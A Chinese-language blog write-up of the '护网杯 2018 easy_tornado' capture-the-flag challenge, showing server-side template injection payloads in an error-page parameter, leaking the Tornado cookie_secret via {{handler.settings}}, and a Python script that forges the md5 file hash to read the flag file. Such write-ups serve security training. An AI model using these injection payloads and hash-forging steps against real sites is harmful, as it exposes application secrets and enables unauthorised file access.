[护网杯 2018]easy_tornado

[护网杯 2018]easy_tornado

首先第一个页面:

打开网页发现了三个链接,一个一个点开查看:

/flag.txt
flag in /fllllllllllllag

/welcome.txt
render

/hints.txt
md5(cookie_secret+md5(filename))

了解tornado:

tornado是个python语言下的模板

根据url中的参数filename和filehash,我们可以大体明白解题方向便是通过验证访问/fllllllllllllag

并且通过hint.txt,我们可以知道我们需要获取cookie_secret来加密得到filehash

怎么样才能得到cookie_secret呢?

根据SSTI模板注入备忘录进行简单测试:

Tornado (Python):
{{7}}
${7*3}
{{7*7}}
{{"%'()*-/=[\]_|}}常见特殊符号

payload:

http://f9bd196b-a08b-49a7-a05b-7ebe550d4f5e.node4.buuoj.cn:81/error?msg={{7}}

当我们使用这条语句测试时,页面回显7

而当我们使用下面三条语句时,页面回显全都是ORZ,过滤了一堆常见符号

这里尝试一下能不能读取配置文件

payload:

http://f9bd196b-a08b-49a7-a05b-7ebe550d4f5e.node4.buuoj.cn:81/error?msg={{config}}

页面回显500:Internal Server Error

万不得已,下载源码

基本操作不行,于是将源码下载后全局搜索cookie_secret

我们可以看到cookie_secret是handler.application.settings的键值

但是我们直接搜索handler.application.settings我们找不到任何东西,所以这里我们寻找handler

找到了一点线索,这里先将RequestHandler类型赋值为self并且赋值给handler,RequestHandler和handler是紧密相关的。

于是我翻开了RequestHandler的声明,里面有句话

  """An alias for `self.application.settings <Application.settings>`."""

原来如此,那这样便可以用handler.settings来访问cookie_secret

payload:

http://f9bd196b-a08b-49a7-a05b-7ebe550d4f5e.node4.buuoj.cn:81/error?msg={{handler.settings}}

最后的md5加密:

filename: /fllllllllllllag

cookie_secret: 78115b4c-fc01-435c-98dd-3e86ed49221b

这里可以直接手工用hackbar加密得到结果,也可以使用如下的脚本进行加密

# _*_coding:utf-8_*_
import hashlib
hash = hashlib.md5()
![](https://img2020.cnblogs.com/blog/2617104/202111/2617104-20211104180856817-1706326752.png)


filename='/fllllllllllllag'
cookie_secret="78115b4c-fc01-435c-98dd-3e86ed49221b"
hash.update(filename.encode('utf-8'))
s1=hash.hexdigest()
hash = hashlib.md5()
hash.update((cookie_secret+s1).encode('utf-8'))
print(hash.hexdigest())

最终的payload:

http://f9bd196b-a08b-49a7-a05b-7ebe550d4f5e.node4.buuoj.cn:81/file?filename=/fllllllllllllag&filehash=bb3ba30eef4971be678e7acb48661755

得到flag:

posted @ 2021-11-04 19:06  merk11  阅读(593)  评论(0编辑  收藏  举报
Live2D